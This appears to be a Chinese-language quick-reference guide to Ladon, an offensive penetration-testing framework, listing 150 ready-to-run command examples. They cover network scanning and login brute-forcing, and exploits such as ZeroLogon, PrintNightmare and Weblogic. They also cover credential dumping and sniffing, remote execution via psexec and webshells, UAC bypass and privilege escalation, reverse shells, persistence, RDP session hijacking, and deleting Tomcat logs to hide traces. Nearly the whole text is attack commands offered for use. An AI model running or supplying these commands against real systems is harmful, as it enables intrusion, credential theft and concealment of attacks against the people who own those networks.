代码拉取完成,页面将自动刷新
Ladon 简明使用教程 完整文档: http://k8gege.org/Ladon
支持Cmd、Shell、Cobalt Strike、PowerShell下使用
Windows版本: .Net、Cobalt Strike、PowerShell
全系统版本:GO(全平台)、Python(理论上全平台)
PS: GUI版主要方便本地测试使用,完整功能使用CMD
### 版本
Ladon9.1.4 20220318
简明用法例子 150例
### 001 自定义线程扫描
例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:Ladon 10.1.2.8/24 MS17010 t=1
80线程:Ladon noping 10.1.2.8/24 MS17010 t=80
在高强度防护下的网络默认线程无法扫描,必须单线程
### 002 Socks5代理扫描
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
Ladon noping 10.1.2.8/24 MS17010
详见:http://k8gege.org/Ladon/proxy.html
### 003 网段扫描/批量扫描
CIDR格式:不只是/24/16/8(所有)
Ladon 192.168.1.8/24 扫描模块
Ladon 192.168.1.8/16 扫描模块
Ladon 192.168.1.8/8 扫描模块
字母格式:仅C段B段A段 顺序排序
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块
### 0x004指定IP范围、网段扫描
Ladon 192.168.1.50-192.168.1.200 ICMP ICMP探测1段50-200的存活主机
Ladon 192.168.1.30-192.168.50.80 ICMP ICMP探测1.30至50.80存活主机
TXT格式
##### 004 ICMP批量扫描C段列表存活主机
Ladon ip24.txt ICMP
##### 005 ICMP批量扫描B段列表存活主机
Ladon ip16.txt ICMP
##### 006 ICMP批量扫描cidr列表(如某国IP段)
Ladon cidr.txt ICMP
##### 007 ICMP批量扫描域名是否存活
Ladon domain.txt ICMP
##### 008 ICMP批量扫描机器是否存活
Ladon host.txt ICMP
##### 009 批量识别URL列表CMS
Ladon url.txt WhatCMS
##### 010 批量检测DrayTek路由器版本、漏洞、弱口令
Ladon url.txt DraytekPoc
##### 011 批量解密Base64密码
Ladon str.txt DeBase64
### 资产扫描、指纹识别、服务识别、存活主机、端口扫描
##### 012 ICMP扫描存活主机(最快)
Ladon 192.168.1.8/24 ICMP
##### 013 Ping探测存活主机(调用系统Ping命令 回显ms、ttl等信息)
Ladon 192.168.1.8/24 Ping
##### 014 多协议探测存活主机 (IP、机器名、MAC/域名、制造商/系统版本)
Ladon 192.168.1.8/24 OnlinePC
##### 015 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
Ladon 192.168.1.8/24 OsScan
##### 016 OXID探测多网卡主机
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
##### 017 DNS探测多网卡主机
Ladon 192.168.1.8/24 DnsScan
##### 018 多协议扫描存活主机IP
Ladon 192.168.1.8/24 OnlineIP
##### 019 扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 MS17010
##### 020 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 SMBGhost
##### 021 扫描Web信息/Http服务
Ladon 192.168.1.8/24 WebScan
##### 022 扫描C段站点URL域名
Ladon 192.168.1.8/24 UrlScan
##### 023 扫描C段站点URL域名
Ladon 192.168.1.8/24 SameWeb
##### 024 扫描子域名、二级域名
Ladon baidu.com SubDomain
##### 025 域名解析IP、主机名解析IP
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
##### 026 DNS查询域内机器、IP (条件域内)
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
##### 027 查询域内机器、IP (条件域内)
Ladon GetDomainIP
##### 028 扫描C段端口、指定端口扫描
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
##### 029 扫描C段WEB及识别CMS(86+Web指纹识别)
Ladon 192.168.1.8/24 WhatCMS
##### 030 扫描思科设备
Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan
##### 031 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)
Ladon EnumMssql
##### 032 枚举网络共享资源 (域、IP、主机名\共享路径)
Ladon EnumShare
##### 033 扫描LDAP服务器(探测域控)
Ladon 192.168.1.8/24 LdapScan
##### 034 扫描FTP服务器
Ladon 192.168.1.8/24 FtpScan
### 暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆
密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html
##### 035 445端口 SMB密码爆破(Windows)
Ladon 192.168.1.8/24 SmbScan
##### 036 135端口 Wmi密码爆破(Windowns)
Ladon 192.168.1.8/24 WmiScan
##### 037 389端口 LDAP服务器、AD域密码爆破(Windows)
Ladon 192.168.1.8/24 LdapScan
##### 038 5985端口 Winrm密码爆破(Windowns)
Ladon 192.168.1.8/24 WinrmScan.ini
##### 039 445端口 SMB NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 SmbHashScan
##### 040 135端口 Wmi NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 WmiHashScan
##### 041 22端口 SSH密码爆破(Linux)
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
##### 042 1433端口 Mssql数据库密码爆破
Ladon 192.168.1.8/24 MssqlScan
##### 043 1521端口 Oracle数据库密码爆破
Ladon 192.168.1.8/24 OracleScan
##### 044 3306端口 Mysql数据库密码爆破
Ladon 192.168.1.8/24 MysqlScan
##### 045 7001端口 Weblogic后台密码爆破
Ladon http://192.168.1.8:7001/console WeblogicScan
Ladon 192.168.1.8/24 WeblogicScan
##### 046 5900端口 VNC远程桌面密码爆破
Ladon 192.168.1.8/24 VncScan
##### 047 21端口 Ftp服务器密码爆破
Ladon 192.168.1.8/24 FtpScan
##### 048 8080端口 Tomcat后台登陆密码爆破
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
##### 049 Web端口 401基础认证密码爆破
Ladon http://192.168.1.8/login HttpBasicScan
##### 050 445端口 Impacket SMB密码爆破(Windowns)
Ladon 192.168.1.8/24 SmbScan.ini
##### 051 445端口 IPC密码爆破(Windowns)
Ladon 192.168.1.8/24 IpcScan.ini
##### 052 139端口Netbios协议Windows密码爆破
Ladon 192.168.1.8/24 NbtScan
##### 053 5985端口Winrm协议Windows密码爆破
Ladon 192.168.1.8/24 WinrmScan
##### 054 网络摄像头密码爆破(内置默认密码)
Ladon 192.168.1.8/24 DvrScan
### 漏洞检测/Poc
##### 055 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)
Ladon 192.168.1.8/24 MS17010
##### 056 SMBGhost漏洞检测 CVE-2020-0796
Ladon 192.168.1.8/24 SMBGhost
##### 057 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
Ladon 192.168.1.8/24 WeblogicPoc
##### 058 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)
Ladon 192.168.1.8/24 PhpStudyPoc
##### 059 ActiveMQ漏洞检测(CVE-2016-3088)
Ladon 192.168.1.8/24 ActivemqPoc
##### 060 Tomcat漏洞检测(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatPoc
##### 061 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
Ladon 192.168.1.8/24 Struts2Poc
##### 062 DraytekPoc CVE-2020-8515漏洞检测、Draytek版本探测、弱口令检测
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
### 漏洞利用/Exploit
##### 063 Weblogic漏洞利用(CVE-2019-2725)
Ladon 192.168.1.8/24 WeblogicExp
##### 064 Tomcat漏洞利用(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatExp
##### 065 Windows 0day漏洞通用DLL注入执行CMD生成器(DLL仅5KB)
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
##### 066 CVE-2021-40444 微软IE/Office 0day漏洞
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
##### 067 DraytekExp CVE-2020-8515远程执行命令EXP
Ladon DraytekExp http://192.168.1.8 whoami
##### 068 ZeroLogon CVE-2020-1472域控提权(密码置空)
Ladon ZeroLogon dc.k8gege.org
##### 069 CVE-2020-0688 Exchange序列化漏洞(.net 4.0)
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
##### 070 ForExec循环漏洞利用(Win10永恒之黑CVE-2020-0796,成功退出以免目标蓝屏)
Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"
### 文件下载、文件传输
##### 071 HTTP下载
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
##### 072 Ftp下载
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
### 加密解密(HEX/Base64)
##### 073 Hex加密解密
Ladon 123456 EnHex
Ladon 313233343536 DeHex
##### 074 Base64加密解密
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
### 网络嗅探
##### 075 Ftp密码嗅探
Ladon FtpSniffer 192.168.1.5
##### 076 HTTP密码嗅探
Ladon HTTPSniffer 192.168.1.5
##### 077 网络嗅探
Ladon Sniffer
### 密码读取
##### 078 读取IIS站点密码、网站路径
Ladon IISpwd
##### 079 读取连接过的WIFI密码
Ladon WifiPwd
##### 080 读取FileZilla FTP密码
Ladon FileZillaPwd
##### 081 读取系统Hash、VPN密码、DPAPI-Key
Ladon CVE-2021-36934
##### 082 DumpLsass内存密码(mimikatz明文) 限9.1.1版本之前
Ladon DumpLsass
### 信息收集
##### 083 获取本机内网IP与外网IP
Ladon GetIP
##### 084 获取PCname GUID CPUID DiskID Mac地址
Ladon GetID
##### 085 查看用户最近访问文件
Ladon Recent
##### 086 USB使用记录查看(USB名称、USB标记、路径信息)
Ladon UsbLog
##### 087 检测后门(注册表启动项、DLL劫持)
Ladon CheckDoor
Ladon AutoRun
##### 088 进程详细信息(程序路径、位数、启动参数、用户)
Ladon EnumProcess
Ladon Tasklist
##### 089 获取命令行参数
Ladon cmdline
Ladon cmdline cmd.exe
##### 090 获取渗透基础信息
Ladon GetInfo
Ladon GetInfo2
##### 091 .NET & PowerShell版本
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
##### 092 运行时版本&编译环境
Ladon Ver
Ladon Version
##### 093 运行时版本&编译环境&安装软件列表
Ladon AllVer
Ladon AllVersion
##### 094 查看IE代理信息
Ladon QueryProxy
##### 095 列目录
Ladon DirList 默认列全盘
Ladon DirList c:\ 指定盘符或目录
##### 096 QueryAdmin查看管理员用户
Ladon QueryAdmin
##### 097 查看本机命名管道
Ladon GetPipe
##### 098 RdpLog查看3389连接记录
Ladon RdpLog
### 远程执行(psexec/wmiexec/atexec/sshexec/smbexec)
##### 099 445端口 加密PSEXEC远程执行命令(交互式)
net user \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
##### 100 135端口 WmiExec远程执行命令 (非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami (8.2前用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami (8.2后用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p (8.2后用法)
##### 101 445端口 AtExec远程执行命令(非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
##### 102 22端口 SshExec远程执行命令(非交互式)
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
##### 103 JspShell远程执行命令(非交互式)
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
##### 104 WebShell远程执行命令(非交互式)
```Bash
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
```
##### 105 135端口 WmiExec2远程执行命令 (非交互式)支持文件上传
Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe
##### 106 445端口 SmbExec Ntlm-Hash非交互式远程执行命令(无回显)
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
##### 107 WinrmExec远程执行命令无回显(支持System权限)
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
### 提权降权
##### 108 whoami查看当前用户权限以及特权
Ladon whoami
##### 109 6种白名单BypassUAC(8.0后)Win7-Win10
用法: Ladon BypassUAC Method Base64Cmd
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
##### 110 BypassUac2 绕过UAC执行,支持Win7-Win10
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)打印机漏洞提权EXP
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
##### 112 CVE-2022-21999 SpoolFool打印机漏洞提权EXP
Ladon SpoolFool poc.dll
Ladon CVE-2022-21999 poc.dll
##### 113 GetSystem 提权System权限执行CMD
Ladon GetSystem cmd.exe
##### 114 复制令牌执行CMD(如system权限降权exploer当前用户)
Ladon GetSystem cmd.exe explorer
##### 115 Runas 模拟用户执行命令
Ladon Runas user pass cmd
##### 116 MS16135提权至SYSTEM
Ladon ms16135 whoami
##### 117 BadPotato服务用户提权至SYSTEM
Ladon BadPotato cmdline
##### 118 SweetPotato服务用户提权至SYSTEM
Ladon SweetPotato cmdline
##### 119 EfsPotato Win7-2019提权(服务用户权限提到system)
Ladon EfsPotato whoami
##### 120 Open3389一键开启3389
Ladon Open3389
##### 121 激活内置管理员Administrator
Ladon ActiveAdmin
##### 122 激活内置用户Guest
Ladon ActiveGuest
### 反弹Shell
##### 123 反弹TCP NC Shell
Ladon ReverseTcp 192.168.1.8 4444 nc
##### 124 反弹TCP MSF Shell
Ladon ReverseTcp 192.168.1.8 4444 shell
##### 125 反弹TCP MSF MET Shell
Ladon ReverseTcp 192.168.1.8 4444 meter
##### 126 反弹HTTP MSF MET Shell
Ladon ReverseHttp 192.168.1.8 4444
##### 127 反弹HTTPS MSF MET Shell
Ladon ReverseHttps 192.168.1.8 4444
##### 128 反弹TCP CMD & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
##### 129 反弹UDP Cmd & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
##### 130 netsh本机888端口转发至112的22端口
Ladon netsh add 888 192.168.1.112 22
##### 131 PortTran端口转发(3389例子)
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338
### 本机执行
##### 132 RDP桌面会话劫持(无需密码)
Ladon RdpHijack 3
Ladon RdpHijack 3 console
##### 133 添加注册表Run启动项
Ladon RegAuto Test c:\123.exe
##### 134 AT计划执行程序(无需时间)(system权限)
Ladon at c:\123.exe
Ladon at c:\123.exe gui
##### 135 SC服务加启动项&执行程序(system权限)
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
### 系统信息探测
##### 136 Snmp协议探测操作系统、设备等信息
Ladon 192.168.1.8/24 SnmpScan
##### 137 Nbt协议探测Windows主机名、域、用户
Ladon 192.168.1.8/24 NbtInfo
##### 138 Smb协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 SmbInfo
##### 139 Wmi协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 WmiInfo
##### 140 Mssql协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 MssqlInfo
##### 141 Winrm协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 WinrmInfo
##### 142 Exchange探测Windows版本、主机名、域
Ladon 192.168.1.8/24 ExchangeInfo
##### 143 Rdp协议探测Windows版本、主机名、域
For单线程: Ladon 192.168.1.8/24 RdpInfo f=1
### 其它功能
##### 144 Win2008一键启用.net 3.5
Ladon EnableDotNet
##### 145 获取内网站点HTML源码
Ladon gethtml http://192.168.1.1
##### 146 一键迷你WEB服务器
Ladon web 80
Ladon web 80 dir
获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg)
http://192.168.1.8/ip.txt
##### 147 getstr/getb64/debase64(无回显漏洞回显结果)
监听 Ladon web 800
提交 返回明文
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64加密结果
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64结果解密
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
##### 148 Shiro插件探测
Ladon 192.168.1.8/24 IsShiro
##### 149 LogDelTomcat 删除Tomcat指定IP日志
Ladon LogDelTomcat access.log 192.168.1.8
##### 150 C#自定义程序集插件扫描
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。